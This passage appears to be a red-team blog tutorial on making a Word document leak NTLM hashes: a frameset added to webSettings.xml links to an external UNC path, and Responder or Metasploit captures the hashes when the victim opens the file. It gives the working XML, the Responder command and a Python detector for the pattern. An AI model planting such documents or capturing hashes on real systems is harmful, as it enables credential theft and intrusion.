are playing a vital role in red team assessments, as they are usually used to gain an initial foothold on the client's internal network. Staying under the radar is a key element as well, and this can only be achieved by abusing legitimate functionality of Windows or of a trusted application such as Microsoft Office.

Historically Microsoft Word could be used as an HTML editor. This means that it supports HTML elements such as framesets. It is therefore possible to link a Microsoft Word document to a UNC path and combine this with Responder in order to capture NTLM hashes externally.

A Word document with the docx extension is actually a zip archive which contains various XML files. These XML files control the theme, the fonts, the settings of the document and the web settings. Using 7-Zip it is possible to open that archive in order to examine these files:


Docx Contents

The word folder contains a file called webSettings.xml. This file needs to be modified in order to include the frameset.


webSettings File

Adding the following XML creates a link to another file:

<w:frameset>
    <w:framesetSplitbar>
        <w:w w:val="60"/>
        <w:color w:val="auto"/>
        <w:noBorder/>
    </w:framesetSplitbar>
    <w:frameset>
        <w:frame>
            <w:name w:val="3"/>
            <w:sourceFileName r:id="rId1"/>
            <w:linkedToFile/>
        </w:frame>
    </w:frameset>
</w:frameset>

webSettings XML – Frameset

The new webSettings.xml file containing the frameset needs to be added back to the archive so that the previous version is overwritten.


webSettings with Frameset – Adding new version to archive

A new file (webSettings.xml.rels) must be created in order to hold the relationship ID (rId1), the UNC path and the TargetMode (external or internal):

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\192.168.1.169\Microsoft_Office_Updates.docx" TargetMode="External"/>
</Relationships>

webSettings XML Relationship File – Contents

The _rels directory contains the relationships of the document in terms of fonts, styles, themes, settings etc. Planting the new file in that directory finalizes the relationship link created previously via the frameset.


webSettings XML rels
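For defenders, the two artifacts above (a w:frameset in word/webSettings.xml and an external UNC Target in word/_rels/webSettings.xml.rels) are exactly what a gateway or triage check should look for. The following is an added example, not code from the original post: it unpacks a .docx with the standard library, flags frames whose relationship resolves to an external UNC path, and builds a constructed sample document so the check can be run offline.

```python
# Added example, not from the original post: triage check for the frameset + external
# UNC relationship pattern. Standard library only; build_sample_docx() is constructed test data.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")  # \\host\... or //host/...


def find_frameset_unc_links(docx_bytes: bytes) -> list:
    """Return external UNC targets that a <w:frame> in webSettings.xml points at."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if not {"word/webSettings.xml", "word/_rels/webSettings.xml.rels"} <= set(z.namelist()):
            return hits  # no frameset wiring present, nothing to flag
        settings = ET.fromstring(z.read("word/webSettings.xml"))
        # relationship ids referenced by frames inside a frameset
        rids = {
            src.get(f"{{{R_NS}}}id")
            for frame in settings.iter(f"{{{W_NS}}}frame")
            for src in frame.findall(f"{{{W_NS}}}sourceFileName")
        }
        rels = ET.fromstring(z.read("word/_rels/webSettings.xml.rels"))
        for rel in rels.iter(f"{{{PKG_NS}}}Relationship"):
            target = rel.get("Target", "")
            if (rel.get("Id") in rids and rel.get("TargetMode") == "External"
                    and UNC_RE.match(target)):
                hits.append(target)
    return hits


def build_sample_docx(target: str, target_mode: str = "External") -> bytes:
    """Constructed minimal .docx holding only the two files the check inspects."""
    web_settings = (
        f'<w:webSettings xmlns:w="{W_NS}" xmlns:r="{R_NS}"><w:frameset><w:frameset>'
        '<w:frame><w:name w:val="3"/><w:sourceFileName r:id="rId1"/><w:linkedToFile/>'
        '</w:frame></w:frameset></w:frameset></w:webSettings>'
    )
    rels = (
        f'<Relationships xmlns="{PKG_NS}"><Relationship Id="rId1" Type="{R_NS}/frame" '
        f'Target="{target}" TargetMode="{target_mode}"/></Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/webSettings.xml", web_settings)
        z.writestr("word/_rels/webSettings.xml.rels", rels)
    return buf.getvalue()
```

A real document with other relationship types or an internal TargetMode is not flagged; only the combination of a frame reference and an external UNC target produces a hit.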

Now that the Word document has been weaponized to connect to a UNC path over the Internet, Responder can be configured in order to capture the NTLM hashes.

responder -I wlan0 -e 192.168.1.169 -b -A -v

Responder Configuration

Once the target user opens the Word document, it will try to connect to the UNC path.


Word – Connect to UNC Path via Frameset

Responder will retrieve the NTLMv2 hash of the user.


Responder – NTLMv2 Hash via Frameset

Alternatively, the Metasploit Framework can be used instead of Responder in order to capture the password hash.

auxiliary/server/capture/smb

Metasploit – SMB Capture Module

NTLMv2 hashes will be captured in Metasploit upon opening the document.


Metasploit SMB Capture Module – NTLMv2 Hash via Frameset

Conclusion

This technique can allow the red team to grab domain password hashes from users, which can lead to internal network access if 2-factor authentication for VPN access is not enabled and there is a weak password policy. Additionally, if the target user is an elevated account such as a local administrator or domain admin, this method can be combined with SMB relay in order to obtain a Meterpreter session.
